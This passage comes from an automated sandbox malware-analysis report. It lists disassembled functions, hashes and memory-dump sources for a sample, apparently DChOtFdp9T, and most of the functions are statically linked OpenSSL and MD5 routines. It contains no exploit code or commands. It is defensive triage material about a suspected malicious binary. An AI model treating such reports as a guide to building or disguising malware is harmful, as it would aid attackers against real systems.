                                                                                                                                                                                                                            • Opcode ID: ccd50790312f35070ea952bdfd1c7acd9846867f6810b18f743ffe61a52793a0
                                                                                                                                                                                                                            • Instruction ID: cf8a8fa76e7f9c925a7692bbafd1c54314448f0f579dd9c639a18829a9f2eed4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccd50790312f35070ea952bdfd1c7acd9846867f6810b18f743ffe61a52793a0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B612D322B0964286EB149B15E570ABD63A0EF45B94F440275DEBEC77EDEF3CE4418B00
                                                                                                                                                                                                                            Function 00007FFDFF25CD30 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free$L_sk_free$D_freeD_get0_providerL_sk_pop_free$E_free$D_lock_freeH_freeO_free_ex_dataO_secure_freeR_freeR_get0_providerX509_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                            • API String ID: 234229340-1080266419
                                                                                                                                                                                                                            • Opcode ID: 4b639082856fd045cf4de6375e292c89bffd49d48b8e2fd70d68950a295ae69d
                                                                                                                                                                                                                            • Instruction ID: 3994d6740ce367e16acf5b02aa28901f3da9902aa4159c0dfb45e3abe63276ef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b639082856fd045cf4de6375e292c89bffd49d48b8e2fd70d68950a295ae69d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4914461B1964284EB04AF22D470BF86711EF85B88F881232DE7DDB7DEEE2DE5458710
                                                                                                                                                                                                                            Function 00007FFDFF241EE2 Relevance: 58.2, APIs: 30, Strings: 3, Instructions: 470COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debug$L_cleanse$O_freememcpy$D_get0_nameD_is_aD_read_lockD_unlockH_retrieveO_strndup_time64
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                            • API String ID: 1519632984-3130753023
                                                                                                                                                                                                                            • Opcode ID: 8cb13298c3e0d310e5cc157dcbe769d251cfafbec6efaec0c4de0f4a02495d03
                                                                                                                                                                                                                            • Instruction ID: 490384832a1c86557c8d24b87f641460a239771ad0164e4786e38f0dbcbe6a18
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cb13298c3e0d310e5cc157dcbe769d251cfafbec6efaec0c4de0f4a02495d03
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA12D462B0D68245F7249B65D460ABDA7A0EF81788F404232DEBDC77DEEE7CE5419700
                                                                                                                                                                                                                            Function 00007FFDFF241FDC Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 249COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$L_sk_pop_free$D_freeL_sk_new_nullL_sk_pushX509_d2i_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$tls_parse_ctos_status_request
                                                                                                                                                                                                                            • API String ID: 1108277277-3579644669
                                                                                                                                                                                                                            • Opcode ID: 444d28b779b4bf6b0dbea551fcd11c5c29281d7c3e4c56fe42e1028072fad119
                                                                                                                                                                                                                            • Instruction ID: a839122f476e6f61e1e059eff43958b440d3001fb6b6e9c54d462d654370bfdf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 444d28b779b4bf6b0dbea551fcd11c5c29281d7c3e4c56fe42e1028072fad119
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49B1BF71B0DA8282EB6497249421EF96351AF85788F844335DABDC7ACEEF2CE2419700
                                                                                                                                                                                                                            Function 00007FFDFF2A3F30 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 207COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$X509_get0_pubkeyX_new_from_pkey
                                                                                                                                                                                                                            • String ID: $..\s\ssl\statem\statem_clnt.c$tls_construct_cke_gost
                                                                                                                                                                                                                            • API String ID: 3869628303-1144584530
                                                                                                                                                                                                                            • Opcode ID: ccd2193d6fdab6bab8e5ba5e064e6e487e82ea76d76af2007fad9fe54f31c4e5
                                                                                                                                                                                                                            • Instruction ID: c7b905e5f3c556959d1f527b6bed243c1cca506a77876c2a272345b95af5bd6d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccd2193d6fdab6bab8e5ba5e064e6e487e82ea76d76af2007fad9fe54f31c4e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD81BE22B0868256F758A762E461FFA2350AF85B84F844231DE7DCB7DEEF2DE5018700
                                                                                                                                                                                                                            Function 00007FFDFF2BAC80 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 182COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$X_free
                                                                                                                                                                                                                            • String ID: $ $..\s\ssl\statem\statem_srvr.c$tls_process_cke_gost18
                                                                                                                                                                                                                            • API String ID: 1470995052-4050591057
                                                                                                                                                                                                                            • Opcode ID: 4403e3e2e4a046cef1a5906fbfa52d8a110b58e64250f3dfa77c72132367596b
                                                                                                                                                                                                                            • Instruction ID: d831d48b97c0bdd72f5b4321b1935c78944901e7e111112ec89773a9d91a5e55
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4403e3e2e4a046cef1a5906fbfa52d8a110b58e64250f3dfa77c72132367596b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C715C60B08A4349F754AB52E831FEA6350EF85784F944231EE3DC7ADEEE2DE5018B40
                                                                                                                                                                                                                            Function 00007FFDFF241CBC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 292COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$D_bytes_exD_get_size
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                            • API String ID: 2724910838-1194634662
                                                                                                                                                                                                                            • Opcode ID: a78344840a62c85cac7b5ba344d15ddac8ad4eb79c0c51800dd73e25e005b03a
                                                                                                                                                                                                                            • Instruction ID: 9f470fe7d66aca1184c4fc918e49c7136f2d0e554411115ca07b26fcdd5fe3fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a78344840a62c85cac7b5ba344d15ddac8ad4eb79c0c51800dd73e25e005b03a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFD18D21B09B8285F7109B65D860BE96790EB85B84F484236EE7CCBBDEDE7CE541C710
                                                                                                                                                                                                                            Function 00007FFDFF241EDD Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debug$O_freeR_set_error$L_sk_findL_sk_pushO_malloc
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_ciph.c$SSL_COMP_add_compression_method
                                                                                                                                                                                                                            • API String ID: 672050802-2070406874
                                                                                                                                                                                                                            • Opcode ID: da00d5c359b32e9532eace9f6e37ccde2012a94ac877b18865f8ffb0be8958ca
                                                                                                                                                                                                                            • Instruction ID: cc014836e6c487dce90f716613abc51f95d48ff5e608f30b27322c567c54ea8e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da00d5c359b32e9532eace9f6e37ccde2012a94ac877b18865f8ffb0be8958ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE415B68F1C64246FB489B11B422AF95352AF84794FC85231EE7DCB6DEEE2CF5408B00
                                                                                                                                                                                                                            Function 00007FFE0CFD1D30 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878106458.00007FFE0CFD0000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878147059.00007FFE0CFD3000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878163707.00007FFE0CFD4000.00000004.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878181390.00007FFE0CFD5000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassert$memcpy
                                                                                                                                                                                                                            • String ID: hs->curlen < BLOCK_SIZE$hs->curlen < BLOCK_SIZE$src/MD5.c$src/MD5.c
                                                                                                                                                                                                                            • API String ID: 4292997394-3186121673
                                                                                                                                                                                                                            • Opcode ID: 18018fa09b56a44398db6380c8fbae6ad14fd47fb90b2d7251dc7d6b7bf8963f
                                                                                                                                                                                                                            • Instruction ID: c926aae4b34989cd19dee44cdb3fba382dd30259aa89085211eab56f24c85b17
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18018fa09b56a44398db6380c8fbae6ad14fd47fb90b2d7251dc7d6b7bf8963f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CD1AE62F2869186FB14CB6CD9447AD77A2FB58388F009135EE8D53A69DF3CE5848B40
                                                                                                                                                                                                                            Function 00007FFDFF25EDC1 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error$O_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_clear
                                                                                                                                                                                                                            • API String ID: 71491925-3113474232
                                                                                                                                                                                                                            • Opcode ID: 2852d1cf352f53b48c25c41027ef0e3b670c22c4b89a966caa49c8ebfb479004
                                                                                                                                                                                                                            • Instruction ID: 55fd5dec3193792b65b9aaeb9820aa6b53a503bf58b093a6206c057c58abb522
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2852d1cf352f53b48c25c41027ef0e3b670c22c4b89a966caa49c8ebfb479004
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F514C72B08A8185E7049F25D4A0AED73A4FB84B98F484235DE7CCB6DEDF78D5818720
                                                                                                                                                                                                                            Function 00007FFDFF241019 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_freeO_malloc
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$ssl_next_proto_validate$tls_parse_stoc_npn
                                                                                                                                                                                                                            • API String ID: 3068916411-2899453981
                                                                                                                                                                                                                            • Opcode ID: a96e1d73e4b0e8ba095d488d7bf120b647c437eded1c369b35a9d4e887dacedc
                                                                                                                                                                                                                            • Instruction ID: 43d34545c21757be30e4c8198a670e56521fedb7d9f2f3c3648db0aec2e98064
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a96e1d73e4b0e8ba095d488d7bf120b647c437eded1c369b35a9d4e887dacedc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C51B161B1978241EB509B64D421FFD67A0FB84748F845235EA7DC77CAEF6CE5818B00
                                                                                                                                                                                                                            Function 00007FFDFF265E10 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error$O_realloc
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$dane_mtype_set
                                                                                                                                                                                                                            • API String ID: 945340710-1331952108
                                                                                                                                                                                                                            • Opcode ID: 380fe91507ae3435bf371d86126d89345ea365ede9dcccf97ca03be3fc8d0dda
                                                                                                                                                                                                                            • Instruction ID: 463471529fa8aeef89889a7f9a6d604065d54ade34e0c26c145b499eb19d1f80
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 380fe91507ae3435bf371d86126d89345ea365ede9dcccf97ca03be3fc8d0dda
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7841E622B0978296E7049B25D821ABAA750EB85758F844731EE7CC77EEDF3CE841C700
                                                                                                                                                                                                                            Function 00007FFDFF2A3D20 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
